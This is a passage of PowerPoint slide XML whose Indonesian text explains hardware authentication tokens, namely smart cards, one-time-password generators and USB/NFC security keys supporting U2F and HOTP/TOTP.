              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Kartu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kartu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PIN) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kartu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NFC).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (OTP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sitoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token. Jenis token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>portabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HSM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NFC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kaitannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> U2F, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HOTP/TOTP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tombol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PIN juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan fob yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
